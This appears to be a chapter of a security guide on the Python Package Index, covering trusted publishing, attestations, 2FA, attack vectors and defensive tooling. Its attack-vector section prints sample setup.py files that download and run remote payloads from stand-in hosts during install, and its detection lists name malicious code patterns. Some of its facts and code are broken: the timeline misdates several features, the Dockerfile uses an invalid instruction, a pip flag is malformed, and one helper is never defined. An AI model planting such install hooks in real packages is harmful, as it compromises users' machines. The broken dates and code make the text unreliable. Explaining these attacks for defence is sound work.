PyPI/Python Ecosystem Security¶

SECURITY LEADER The Python Package Index (PyPI) has emerged as a leader in package ecosystem security, implementing innovative features like trusted publishing, attestations, and comprehensive security policies. These advances make PyPI a model for other package ecosystems to follow.

PyPI Ecosystem Overview¶

Scale and Characteristics¶

PyPI serves the Python community with impressive scale and security-focused features:

400,000+ packages with steady, quality-focused growth
~6 billion downloads per month across all packages
Trusted publishing with OIDC for secure package uploads
Digital attestations for package provenance verification
Strong security policies and incident response procedures

PyPI Security Evolution¶

PyPI has undergone significant security improvements over recent years:

timeline
    title PyPI Security Evolution

    2018 : Legacy PyPI retirement
         : Move to Warehouse (modern codebase)
         : Basic 2FA support

    2019 : Mandatory 2FA for critical projects
         : Improved audit logging
         : Security key support

    2020 : API token system
         : Enhanced monitoring
         : Vulnerability reporting program

    2021 : Malware detection system
         : Improved package scanning
         : Security policies enforcement

    2022 : Trusted publishing (OIDC)
         : Digital attestations
         : Enhanced threat intelligence

    2023 : Comprehensive attestation support
         : Advanced security analytics
         : Ecosystem-wide security improvements

Trusted Publishing: PyPI's Security Innovation¶

What is Trusted Publishing?¶

Trusted publishing uses OpenID Connect (OIDC) to establish cryptographic trust between PyPI and external systems like GitHub Actions, eliminating the need for long-lived API tokens.

sequenceDiagram
    participant GHA as GitHub Actions
    participant OIDC as GitHub OIDC Provider
    participant PyPI as PyPI
    participant Package as Package Registry

    Note over GHA,Package: Trusted Publishing Flow

    GHA->>OIDC: Request OIDC token for workflow
    OIDC->>GHA: Return signed JWT token
    GHA->>PyPI: Present OIDC token for authentication
    PyPI->>OIDC: Verify token signature and claims
    OIDC->>PyPI: Token validation response
    PyPI->>PyPI: Check token claims against project configuration
    PyPI->>GHA: Grant publish permissions
    GHA->>Package: Upload package with verified identity

Benefits of Trusted Publishing¶

No Long-lived Secrets: Eliminates API tokens in CI/CD environments
Cryptographic Trust: Uses public key cryptography for verification
Granular Permissions: Specific repository and workflow authorization
Audit Trail: Complete logging of publishing actions
Reduced Attack Surface: No credentials to steal or compromise

Setting Up Trusted Publishing¶

# .github/workflows/publish.yml
name: Publish to PyPI

on:
  release:
    types: [published]

jobs:
  publish:
    runs-on: ubuntu-latest
    permissions:
      id-token: write  # Required for OIDC token
      contents: read

    steps:
      - uses: actions/checkout@v4

      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.x'

      - name: Install build dependencies
        run: python -m pip install build

      - name: Build package
        run: python -m build

      - name: Publish to PyPI
        uses: pypa/gh-action-pypi-publish@release/v1
        # No API token needed with trusted publishing!

PyPI Project Configuration:

# Configure trusted publishing on PyPI
1. Go to PyPI project management page
2. Add GitHub as trusted publisher
3. Specify: owner/repository, workflow filename, environment (optional)
4. No API token configuration needed

Digital Attestations and Provenance¶

Package Attestations¶

PyPI supports digital attestations that provide cryptographic proof of package origins:

{
  "_type": "https://in-toto.io/Statement/v0.1",
  "subject": [
    {
      "name": "my_package-1.0.0-py3-none-any.whl",
      "digest": {
        "sha256": "abcd1234..."
      }
    }
  ],
  "predicateType": "https://slsa.dev/provenance/v0.2",
  "predicate": {
    "builder": {
      "id": "https://github.com/actions/runner/github-hosted"
    },
    "buildType": "https://github.com/actions/workflow@v1",
    "invocation": {
      "configSource": {
        "uri": "git+https://github.com/owner/repo@refs/heads/main",
        "digest": {
          "sha1": "def5678..."
        }
      }
    },
    "metadata": {
      "buildInvocationId": "123456789",
      "buildStartedOn": "2023-01-01T00:00:00Z"
    }
  }
}

Verifying Attestations¶

# Install verification tools
pip install sigstore

# Verify package attestations
python -m sigstore verify identity \
  --cert-identity https://github.com/owner/repo/.github/workflows/publish.yml@refs/heads/main \
  --cert-oidc-issuer https://token.actions.githubusercontent.com \
  package.whl package.whl.sig

PyPI Security Features¶

1. Multi-Factor Authentication¶

PyPI requires 2FA for maintainers of critical projects:

# Enable 2FA on PyPI account
1. Visit PyPI account settings
2. Add authentication application (TOTP)
3. Add security keys (FIDO2/WebAuthn) - recommended
4. Download recovery codes

# Critical projects automatically require 2FA
# Affects ~4,000 projects covering ~90% of PyPI downloads

2. API Token Security¶

PyPI provides scoped API tokens with limited permissions:

# Create scoped API token
1. Generate token with specific project scope
2. Set token expiration date
3. Limit token to specific actions (upload only)
4. Use token in CI/CD instead of password

# Token format provides metadata
pypi-AgEIcHlwaS5vcmcCJDAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwMAACKlsxLCJwcm9qZWN0LXJlYWQiXQAABiAJYWJjZGVmZ2hpams...

3. Malware Detection¶

PyPI implements automated malware detection:

# Example malware patterns PyPI detects
suspicious_patterns = [
    "eval(base64.b64decode(",     # Base64 encoded execution
    "exec(compile(",              # Dynamic compilation
    "__import__('os').system(",   # OS command execution
    "socket.socket(",             # Network connections
    "subprocess.Popen(",          # Process spawning
]

# PyPI scanning process
1. Automated scanning of all uploaded packages
2. Machine learning-based malware detection
3. Human review for suspicious packages
4. Rapid response for confirmed malware

4. Package Integrity¶

PyPI ensures package integrity through multiple mechanisms:

# SHA256 hashes for all files
https://files.pythonhosted.org/packages/a1/b2/c3.../package-1.0.0.tar.gz
# Hash: sha256:abcd1234efgh5678ijkl9012mnop3456qrst7890uvwx1234yz567890

# Package verification
pip install package==1.0.0 --hash=sha256:abcd1234efgh5678ijkl9012mnop3456qrst7890uvwx1234yz567890

Python Package Installation Security¶

pip Installation Process¶

Understanding pip's installation process reveals security considerations:

# pip install security analysis
1. Resolve package dependencies from PyPI
2. Download package files (wheel or source)
3. Verify package integrity (SHA256)
4. Install package files
5. Execute setup.py (for source distributions)
6. Run post-install scripts if present

Security Implications¶

# setup.py can execute arbitrary code
from setuptools import setup
import os
import subprocess

# This code runs during installation!
os.system("curl -s malicious-site.com/script.sh | bash")

setup(
    name="malicious-package",
    version="1.0.0",
    # ... package configuration
)

Secure Installation Practices¶

# Use specific versions and hashes
pip install package==1.0.0 --hash=sha256:known_good_hash

# Install from wheels when possible (no setup.py execution)
pip install package --only-binary=all

# Use virtual environments for isolation
python -m venv myenv
source myenv/bin/activate
pip install package

# Check package before installation
pip download package
# Inspect contents before installing

Common PyPI Attack Vectors¶

1. Typosquatting¶

Despite security measures, typosquatting remains a concern:

# Legitimate packages vs malicious variants
requests    ->  request, requsts, reqeusts
numpy       ->  nympy, numpi, numpy-dev
django      ->  djago, django-admin, djangos
flask       ->  falsk, flask-login, flasks

2. Dependency Confusion¶

Exploiting package name resolution:

# Example attack scenario
# 1. Attacker identifies internal package name
# 2. Publishes package with same name to PyPI
# 3. Developer accidentally installs public version

# Protection: Use private package index
pip install package --index-url https://private-pypi.company.com/

3. Setup.py Exploitation¶

Malicious code in setup.py files:

# Example malicious setup.py
from setuptools import setup
import base64
import urllib.request

# Download and execute malicious payload
payload = urllib.request.urlopen('https://evil.com/payload.py').read()
exec(compile(base64.b64decode(payload), '<string>', 'exec'))

setup(name='innocent-package', version='1.0.0')

4. Package Takeover¶

Compromising existing packages:

Account compromise: Stealing maintainer credentials
Social engineering: Convincing maintainers to add attackers
Package abandonment: Taking over unmaintained packages
Transfer exploitation: Exploiting package ownership transfers

Advanced PyPI Security¶

1. Private Package Repositories¶

Setting up secure private PyPI repositories:

# Using devpi for private PyPI
pip install devpi-server devpi-client

# Start devpi server
devpi-server --start

# Configure client
devpi use http://localhost:3141
devpi user -c testuser password=123
devpi login testuser
devpi index -c dev

# Upload private packages
devpi upload

2. Package Verification Scripts¶

#!/usr/bin/env python3
"""
PyPI Package Security Verification Script
"""

import requests
import hashlib
import json
import zipfile
import ast
import re
from pathlib import Path

class PyPISecurityVerifier:
    def __init__(self):
        self.suspicious_patterns = [
            r'eval\s*\(',
            r'exec\s*\(',
            r'__import__\s*\(',
            r'subprocess\.',
            r'os\.system',
            r'socket\.socket',
            r'urllib\.request',
            r'base64\.b64decode',
        ]

    def check_package_metadata(self, package_name):
        """Check package metadata for suspicious indicators."""
        url = f"https://pypi.org/pypi/{package_name}/json"
        response = requests.get(url)

        if response.status_code != 200:
            return {"error": "Package not found"}

        data = response.json()
        info = data['info']

        # Security checks
        checks = {
            "package_age": self._check_package_age(data),
            "maintainer_count": len(info.get('maintainer_email', '').split(',')),
            "download_stats": self._get_download_stats(package_name),
            "version_frequency": self._check_version_frequency(data),
            "has_source_distribution": self._has_source_distribution(data),
        }

        return checks

    def analyze_source_code(self, package_path):
        """Analyze package source code for suspicious patterns."""
        suspicious_files = []

        for py_file in Path(package_path).rglob("*.py"):
            with open(py_file, 'r', encoding='utf-8', errors='ignore') as f:
                content = f.read()

                # Check for suspicious patterns
                for pattern in self.suspicious_patterns:
                    if re.search(pattern, content):
                        suspicious_files.append({
                            "file": str(py_file),
                            "pattern": pattern,
                            "line": self._find_line_number(content, pattern)
                        })

        return suspicious_files

    def verify_package_integrity(self, package_name, version):
        """Verify package integrity using PyPI checksums."""
        url = f"https://pypi.org/pypi/{package_name}/{version}/json"
        response = requests.get(url)
        data = response.json()

        files = data['urls']
        verification_results = []

        for file_info in files:
            file_url = file_info['url']
            expected_hash = file_info['digests']['sha256']

            # Download and verify
            file_response = requests.get(file_url)
            actual_hash = hashlib.sha256(file_response.content).hexdigest()

            verification_results.append({
                "filename": file_info['filename'],
                "expected_hash": expected_hash,
                "actual_hash": actual_hash,
                "verified": expected_hash == actual_hash
            })

        return verification_results

    def _check_package_age(self, data):
        # Implementation details...
        pass

    def _get_download_stats(self, package_name):
        # Implementation details...
        pass

# Usage example
verifier = PyPISecurityVerifier()
results = verifier.check_package_metadata("requests")
print(json.dumps(results, indent=2))

3. Dependency Pinning and Lock Files¶

# requirements.txt with hashes
requests==2.31.0 \
    --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f \
    --hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1

# Using pip-tools for dependency management
pip install pip-tools

# Create requirements.in
echo "requests" > requirements.in

# Generate locked requirements with hashes
pip-compile --generate-hashes requirements.in

# Install with verification
pip-sync requirements.txt

4. CI/CD Security for Python Projects¶

# Secure Python CI/CD pipeline
name: Python Security Pipeline

on: [push, pull_request]

jobs:
  security:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'

      - name: Install security tools
        run: |
          pip install safety bandit semgrep

      - name: Check for known vulnerabilities
        run: |
          # Check for vulnerable packages
          safety check

      - name: Static security analysis
        run: |
          # Security linting with bandit
          bandit -r src/

      - name: Semantic security analysis
        run: |
          # Advanced pattern matching
          semgrep --config=auto src/

      - name: Dependency analysis
        run: |
          # Generate and check SBOM
          pip install cyclonedx-bom
          cyclonedx-py -o sbom.json

      - name: Upload SBOM
        uses: actions/upload-artifact@v3
        with:
          name: python-sbom
          path: sbom.json

PyPI vs Other Ecosystems¶

Security Feature Comparison¶

Feature	PyPI	npm	Maven Central	NuGet
Trusted Publishing	✅ Full OIDC support	❌ Not available	❌ Not available	❌ Not available
Digital Attestations	✅ Full support	🔶 Experimental	❌ Not available	❌ Not available
Mandatory 2FA	✅ Critical projects	🔶 High-impact packages	❌ Optional	❌ Optional
Malware Detection	✅ Automated + manual	🔶 Basic detection	🔶 Basic scanning	🔶 Basic scanning
Package Signing	✅ Built-in attestations	🔶 Experimental	✅ PGP signing	✅ Code signing

What Other Ecosystems Can Learn¶

Trusted Publishing Model: Eliminates long-lived secrets in CI/CD
Proactive Security Policies: Mandatory 2FA for critical projects
Comprehensive Attestations: Full provenance tracking
Community Engagement: Active security community involvement
Rapid Incident Response: Quick response to security issues

Developer Environment Protection¶

1. Virtual Environment Security¶

# Secure virtual environment practices
python -m venv --prompt="secure-project" venv
source venv/bin/activate

# Verify environment isolation
which python
which pip

# Install with verification
pip install --require-hashes -r requirements.txt

# Regular environment cleanup
deactivate
rm -rf venv

2. Package Installation Monitoring¶

# Monitor package installations
import sys
import importlib.util
from functools import wraps

def monitor_imports(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        if args and isinstance(args[0], str):
            package_name = args[0]
            print(f"🔍 Importing package: {package_name}")

            # Check for suspicious packages
            if is_suspicious_package(package_name):
                print(f"⚠️ Warning: Suspicious package detected: {package_name}")

        return func(*args, **kwargs)
    return wrapper

# Patch import mechanism
original_import = __builtins__.__import__
__builtins__.__import__ = monitor_imports(original_import)

3. Sandboxed Development¶

# Using containers for Python development
# Dockerfile.python-dev
FROM python:3.11-slim

# Create non-root user
RUN useradd -m -u 1000 developer

# Install security tools
RUN pip install safety bandit

# Set up workspace
WORKDIR /workspace
CHOWN developer:developer /workspace

# Switch to non-root user
USER developer

# Entry point
CMD ["bash"]

Incident Response: PyPI Security Breaches¶

Historical Incidents¶

2019 - Jellyfish Package: Cryptocurrency miner in package
2020 - Python Package Backdoor: Banking trojan distribution
2021 - Dependency Confusion: Major companies affected
2022 - Crypto Package Attacks: Multiple malicious packages

PyPI's Response Improvements¶

Automated Detection: Machine learning-based malware detection
Rapid Response: Sub-hour response times for confirmed threats
Community Reporting: Easy reporting mechanisms for users
Transparency: Public incident reports and lessons learned

Lessons for Organizations¶

# PyPI Incident Response Lessons

## Prevention
- Implement trusted publishing where possible
- Use package verification and attestations
- Maintain comprehensive package inventories
- Regular security training for developers

## Detection
- Monitor package installations and updates
- Implement SBOM tracking and analysis
- Use automated vulnerability scanning
- Establish baseline behavior patterns

## Response
- Have pre-planned incident response procedures
- Maintain communication channels with package maintainers
- Implement rapid rollback capabilities
- Document lessons learned for future improvement

Future of PyPI Security¶

Ongoing Initiatives¶

SLSA Framework Integration: Enhanced supply chain security standards
Sigstore Adoption: Keyless signing for all packages
Machine Learning Enhancement: Improved threat detection
Cross-Ecosystem Collaboration: Sharing security innovations

Recommended Practices¶

Adopt Trusted Publishing: Eliminate long-lived tokens
Verify Attestations: Check package provenance
Use Security Tools: Integrate safety, bandit, and others
Stay Informed: Follow PyPI security announcements
Contribute Back: Report issues and improve ecosystem security

Conclusion¶

PyPI has emerged as a security leader in the package ecosystem space, demonstrating how proactive security measures can significantly improve ecosystem security. Key innovations include:

Trusted Publishing: Eliminating long-lived secrets
Digital Attestations: Cryptographic provenance verification
Proactive Policies: Mandatory 2FA for critical projects
Community Engagement: Active security community involvement

BEST PRACTICE Organizations should look to PyPI's security model as a template for secure package management. The trusted publishing and attestation features represent the future direction for package ecosystem security.

The next section covers Maven/Java Ecosystem Security, which has its own unique security characteristics and challenges.